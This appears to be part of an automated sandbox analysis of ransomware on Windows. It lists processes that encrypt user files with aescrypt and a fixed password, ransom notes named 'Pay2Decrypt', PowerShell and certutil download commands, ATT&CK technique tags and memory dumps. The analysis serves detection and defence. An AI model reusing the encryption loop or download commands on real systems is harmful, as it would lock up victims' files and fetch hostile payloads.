- - C:\Windows\system32\attrib.exe
    attrib +r "UnpublishFind.sql.lck"
    3⤵
    PID:2932
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "FindTest.TTS.lck" "FindTest.TTS"
    3⤵
    PID:2572
- - C:\Windows\system32\attrib.exe
    attrib +r "FindTest.TTS.lck"
    3⤵
    - Views/modifies file attributes
    PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4384
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:4296
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    - Views/modifies file attributes
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:2140
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4360
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4376
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:3132
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
    3⤵
    PID:4340
- - C:\Windows\system32\attrib.exe
    attrib +r "Wallpaper.jpg.lck"
    3⤵
    PID:4836
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResumeStop.cr2.lck" "ResumeStop.cr2"
    3⤵
    PID:3336
- - C:\Windows\system32\attrib.exe
    attrib +r "ResumeStop.cr2.lck"
    3⤵
    PID:5096
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitSet.svg.lck" "SplitSet.svg"
    3⤵
    PID:3384
- - C:\Windows\system32\attrib.exe
    attrib +r "SplitSet.svg.lck"
    3⤵
    PID:300
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "AssertResume.eps.lck" "AssertResume.eps"
    3⤵
    PID:4048
- - C:\Windows\system32\attrib.exe
    attrib +r "AssertResume.eps.lck"
    3⤵
    - Views/modifies file attributes
    PID:4068
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "BlockSend.ico.lck" "BlockSend.ico"
    3⤵
    PID:4448
- - C:\Windows\system32\attrib.exe
    attrib +r "BlockSend.ico.lck"
    3⤵
    - Views/modifies file attributes
    PID:3372
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReceivePush.gif.lck" "ReceivePush.gif"
    3⤵
    PID:1960
- - C:\Windows\system32\attrib.exe
    attrib +r "ReceivePush.gif.lck"
    3⤵
    PID:520
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockMove.jpeg.lck" "UnblockMove.jpeg"
    3⤵
    PID:4080
- - C:\Windows\system32\attrib.exe
    attrib +r "UnblockMove.jpeg.lck"
    3⤵
    PID:4580
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OpenFind.dib.lck" "OpenFind.dib"
    3⤵
    PID:4564
- - C:\Windows\system32\attrib.exe
    attrib +r "OpenFind.dib.lck"
    3⤵
    PID:4600
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "CompleteUnblock.dxf.lck" "CompleteUnblock.dxf"
    3⤵
    PID:4540
- - C:\Windows\system32\attrib.exe
    attrib +r "CompleteUnblock.dxf.lck"
    3⤵
    - Views/modifies file attributes
    PID:4544
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisablePush.ico.lck" "DisablePush.ico"
    3⤵
    PID:1504
- - C:\Windows\system32\attrib.exe
    attrib +r "DisablePush.ico.lck"
    3⤵
    - Views/modifies file attributes
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "OutRegister.wmf.lck" "OutRegister.wmf"
    3⤵
    PID:992
- - C:\Windows\system32\attrib.exe
    attrib +r "OutRegister.wmf.lck"
    3⤵
    - Views/modifies file attributes
    PID:1520
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertToApprove.gif.lck" "ConvertToApprove.gif"
    3⤵
    PID:1784
- - C:\Windows\system32\attrib.exe
    attrib +r "ConvertToApprove.gif.lck"
    3⤵
    - Views/modifies file attributes
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MergeCheckpoint.dxf.lck" "MergeCheckpoint.dxf"
    3⤵
    PID:1820
- - C:\Windows\system32\attrib.exe
    attrib +r "MergeCheckpoint.dxf.lck"
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2552
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:4728
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    - Views/modifies file attributes
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Everywhere.search-ms.lck" "Everywhere.search-ms"
    3⤵
    PID:4732
- - C:\Windows\system32\attrib.exe
    attrib +r "Everywhere.search-ms.lck"
    3⤵
    PID:4420
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Indexed.lck" "Indexed"
    3⤵
    PID:2216
- - C:\Windows\system32\attrib.exe
    attrib +r "Indexed.lck"
    3⤵
    PID:4384
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:2196
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:2224
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms.lck" "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms"
    3⤵
    PID:4696
- - C:\Windows\system32\attrib.exe
    attrib +r "winrt--{S-1-5-21-3341490333-719741536-2920803124-1000}-.searchconnector-ms.lck"
    3⤵
    PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:2136
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:3088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4992
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:1620
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:4836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:1644
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2112
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:2176
- - C:\Windows\system32\attrib.exe
    attrib +r "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:188
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:2156
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4680
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:756
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4320
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:4860
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5096
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:4848
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4428
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Indexed.lck" "Indexed"
    3⤵
    PID:5112
- - C:\Windows\system32\attrib.exe
    attrib +r "Indexed.lck"
    3⤵
    - Views/modifies file attributes
    PID:4900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:3436
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:3380
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    - Views/modifies file attributes
    PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2164
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:4108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2628

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt11.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3236

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt70.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4248

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/992-20-0x00007FFBE2DA0000-0x00007FFBE378C000-memory.dmp

Filesize
9.9MB

Download
memory/992-24-0x0000022925353000-0x0000022925355000-memory.dmp

Filesize
8KB

Download
memory/992-23-0x0000022925350000-0x0000022925352000-memory.dmp

Filesize
8KB

Download
memory/992-22-0x0000022928000000-0x0000022928001000-memory.dmp

Filesize
4KB

Download
memory/992-21-0x0000022925310000-0x0000022925311000-memory.dmp

Filesize
4KB

Download
memory/992-33-0x0000022925356000-0x0000022925358000-memory.dmp

Filesize
8KB

Download
memory/992-34-0x0000022925358000-0x0000022925359000-memory.dmp

Filesize
4KB

Download
memory/1380-49-0x000002AAEB7E0000-0x000002AAEB7E2000-memory.dmp

Filesize
8KB

Download
memory/1380-50-0x000002AAEB7E3000-0x000002AAEB7E5000-memory.dmp

Filesize
8KB

Download
memory/1380-68-0x000002AAEB7E6000-0x000002AAEB7E8000-memory.dmp

Filesize
8KB

Download
memory/1380-45-0x00007FFBE2920000-0x00007FFBE330C000-memory.dmp

Filesize
9.9MB

Download
memory/1380-69-0x000002AAEB7E8000-0x000002AAEB7E9000-memory.dmp

Filesize
4KB

Download
memory/2096-173-0x00000261C14F3000-0x00000261C14F5000-memory.dmp

Filesize
8KB

Download
memory/2096-174-0x00000261C14F6000-0x00000261C14F8000-memory.dmp

Filesize
8KB

Download
memory/2096-169-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/2096-172-0x00000261C14F0000-0x00000261C14F2000-memory.dmp

Filesize
8KB

Download
memory/2164-191-0x0000021D75CC0000-0x0000021D75CC2000-memory.dmp

Filesize
8KB

Download
memory/2164-194-0x0000021D75CC8000-0x0000021D75CC9000-memory.dmp

Filesize
4KB

Download
memory/2164-188-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/2164-192-0x0000021D75CC3000-0x0000021D75CC5000-memory.dmp

Filesize
8KB

Download
memory/2164-193-0x0000021D75CC6000-0x0000021D75CC8000-memory.dmp

Filesize
8KB

Download
memory/2572-32-0x00007FFBE2B00000-0x00007FFBE34EC000-memory.dmp

Filesize
9.9MB

Download
memory/2572-38-0x000001AA56BF0000-0x000001AA56BF2000-memory.dmp

Filesize
8KB

Download
memory/2572-39-0x000001AA56BF3000-0x000001AA56BF5000-memory.dmp

Filesize
8KB

Download
memory/2572-43-0x000001AA56BF6000-0x000001AA56BF8000-memory.dmp

Filesize
8KB

Download
memory/4048-154-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/4048-159-0x000002C9FAFC3000-0x000002C9FAFC5000-memory.dmp

Filesize
8KB

Download
memory/4048-158-0x000002C9FAFC0000-0x000002C9FAFC2000-memory.dmp

Filesize
8KB

Download
memory/4048-161-0x000002C9FAFC6000-0x000002C9FAFC8000-memory.dmp

Filesize
8KB

Download
memory/4048-163-0x000002C9FAFC8000-0x000002C9FAFC9000-memory.dmp

Filesize
4KB

Download
memory/4060-178-0x000002BB56C20000-0x000002BB56C22000-memory.dmp

Filesize
8KB

Download
memory/4060-175-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/4060-181-0x000002BB56C28000-0x000002BB56C29000-memory.dmp

Filesize
4KB

Download
memory/4060-179-0x000002BB56C23000-0x000002BB56C25000-memory.dmp

Filesize
8KB

Download
memory/4060-180-0x000002BB56C26000-0x000002BB56C28000-memory.dmp

Filesize
8KB

Download
memory/4260-168-0x00000269A67B6000-0x00000269A67B8000-memory.dmp

Filesize
8KB

Download
memory/4260-162-0x00000269A67B0000-0x00000269A67B2000-memory.dmp

Filesize
8KB

Download
memory/4260-160-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/4260-164-0x00000269A67B3000-0x00000269A67B5000-memory.dmp

Filesize
8KB

Download
memory/4340-151-0x000002B6623C0000-0x000002B6623C2000-memory.dmp

Filesize
8KB

Download
memory/4340-152-0x000002B6623C3000-0x000002B6623C5000-memory.dmp

Filesize
8KB

Download
memory/4340-147-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/4340-153-0x000002B6623C6000-0x000002B6623C8000-memory.dmp

Filesize
8KB

Download
memory/4544-183-0x000001FB6C380000-0x000001FB6C382000-memory.dmp

Filesize
8KB

Download
memory/4544-182-0x00007FFBE2A30000-0x00007FFBE341C000-memory.dmp

Filesize
9.9MB

Download
memory/4544-184-0x000001FB6C383000-0x000001FB6C385000-memory.dmp

Filesize
8KB

Download
memory/4544-187-0x000001FB6C386000-0x000001FB6C388000-memory.dmp

Filesize
8KB

Download